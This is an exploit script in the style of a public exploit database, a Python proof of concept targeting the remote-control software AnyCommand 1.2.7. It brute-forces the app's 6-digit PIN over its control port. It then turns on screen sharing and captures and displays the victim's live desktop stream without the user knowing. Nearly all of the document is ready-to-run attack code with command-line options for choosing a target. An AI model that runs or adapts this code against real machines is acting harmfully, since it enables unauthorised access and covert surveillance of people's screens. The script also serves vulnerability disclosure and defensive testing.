# Exploit Title: AnyCommand 1.2.7 - Authenticated Live Desktop Stream Access # Date: 30/06/25 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://anycommand.io/ # Software Link: https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download # Version: 1.2.7 # Tested on: Windows 10 ''' Description: AnyCommand 1.2.7 allows unauthenticated attackers to brute-force the 6-digit PIN over the control port (TCP/8000) and remotely activate the screen sharing feature. Once authenticated, the attacker can fetch and view a live MJPEG stream of the victim's desktop without any user interaction. This leads to full passive surveillance of the remote system in real time. ''' import socket import json import time import argparse import sys import requests import re import cv2 import numpy as np def send_line(sock, message): sock.sendall((message + "\n").encode()) def recv_quick(sock, timeout=1.0): sock.settimeout(timeout) try: return sock.recv(4096).decode(errors='ignore').strip() except: return "" finally: sock.settimeout(None) def try_pin(host, port, pin_str): try: sock = socket.socket() sock.settimeout(2.0) sock.connect((host, port)) if not recv_quick(sock): return False formats = [ json.dumps({"pin": pin_str}), json.dumps({"auth": {"pin": pin_str}}) ] for payload in formats: sock.sendall((payload + "\n").encode()) response = recv_quick(sock) if "AUTH_SUCCESS" in response: return True return False except: return False finally: sock.close() def bruteforce(host, port, start=149506, end=999999): total = end - start + 1 found_pin = None last_update = time.time() update_interval = 0.5 print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})") print("[*] Press Ctrl+C to stop") try: for i, pin in enumerate(range(start, end + 1)): pin_str = str(pin).zfill(6) if time.time() - last_update > update_interval: progress = (i / total) * 100 print(f"\r[>] Progress: {progress:.1f}% | Current PIN: {pin_str}", end='', flush=True) last_update = time.time() if try_pin(host, port, pin_str): print(f"\n[+] SUCCESS! Found PIN: {pin_str}") return pin_str except KeyboardInterrupt: print("\n[!] Bruteforce interrupted by user") print("\n[-] Bruteforce completed. No valid PIN found.") return None def authenticate_and_start_stream(host, port, pin): try: sock = socket.create_connection((host, port), timeout=5) print(f"[*] Connected to control port {host}:{port}") time.sleep(0.5) banner = recv_quick(sock) print(f"[*] Banner: {banner}") time.sleep(0.3) print("[*] Attempting authentication...") auth_payloads = [ json.dumps({"pin": pin}), json.dumps({"auth": {"pin": pin}}) ] for payload in auth_payloads: send_line(sock, payload) time.sleep(0.3) auth_response = recv_quick(sock) if "AUTH_SUCCESS" in auth_response: print("[✓] Authentication successful") break else: print("[-] Authentication failed") return False print("[*] Sending screen_view command...") send_line(sock, "screen_view:start") time.sleep(0.8) screen_response = recv_quick(sock) if "OK" not in screen_response: print("[-] Failed to start screen view") return False print("[+] Screen view started successfully") sock.close() time.sleep(1.0) return True except Exception as e: print(f"[!] Control connection error: {e}") return False finally: if 'sock' in locals() and sock: sock.close() def fetch_root_page(host): try: url = f"http://{host}:8081/" headers = { "Host": f"{host}:8081", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "Accept": "*/*", "X-Requested-With": "com.polyhistor.remoteme", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9" } requests.get(url, headers=headers, timeout=10) return True except: return False def fetch_screen_stream(host): timestamp_ms = int(time.time() * 1000) stream_url = f"http://{host}:8081/stream?t={timestamp_ms}" headers = { "Host": f"{host}:8081", "Connection": "keep-alive", "User-Agent": "Mozilla/5.0", "Accept": "image/*,*/*;q=0.8", "X-Requested-With": "com.polyhistor.remoteme", "Referer": f"http://{host}:8081/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9" } try: print("[*] Connecting to stream...") response = requests.get(stream_url, headers=headers, stream=True, timeout=10) if "multipart/x-mixed-replace" not in response.headers.get("Content-Type", ""): print("[-] Stream is not MJPEG. Aborting.") return False print("[+] Stream connected. Rendering frames... Press 'q' to quit.\n") boundary = b"--frame" buffer = b"" for chunk in response.iter_content(chunk_size=1024): buffer += chunk while boundary in buffer: part, buffer = buffer.split(boundary, 1) match = re.search(b'\r\n\r\n(.*)', part, re.DOTALL) if match: jpg_data = match.group(1) try: img_array = np.frombuffer(jpg_data, dtype=np.uint8) frame = cv2.imdecode(img_array, cv2.IMREAD_COLOR) if frame is not None: cv2.imshow("Remote Screen", frame) if cv2.waitKey(1) & 0xFF == ord('q'): cv2.destroyAllWindows() return True except: continue except KeyboardInterrupt: print("\n[!] Stopped by user.") cv2.destroyAllWindows() except Exception as e: print(f"[!] Stream error: {e}") return False return True def main(): parser = argparse.ArgumentParser(description='AnyCommand Screen Stream Exploit by blue0x1 (Chokri Hammedi)') parser.add_argument('--host', required=True, help='Target IP address') parser.add_argument('--port', type=int, default=8000, help='Target port') parser.add_argument('--pin', help='6-digit PIN') parser.add_argument('--bruteforce', action='store_true', help='Bruteforce PIN') args = parser.parse_args() print(f"[*] Starting exploit against {args.host}:{args.port}") if args.bruteforce: found_pin = bruteforce(args.host, args.port) if found_pin: print(f"[+] Use this PIN: --pin {found_pin}") return if not args.pin: print("[-] Please specify --pin or use --bruteforce") return if not authenticate_and_start_stream(args.host, args.port, args.pin): print("[-] Failed to start screen stream") return if not fetch_root_page(args.host): print("[-] Failed to fetch root page") return if not fetch_screen_stream(args.host): print("[-] Failed to fetch screen stream") return print("[+] Exploit completed successfully") if __name__ == "__main__": main()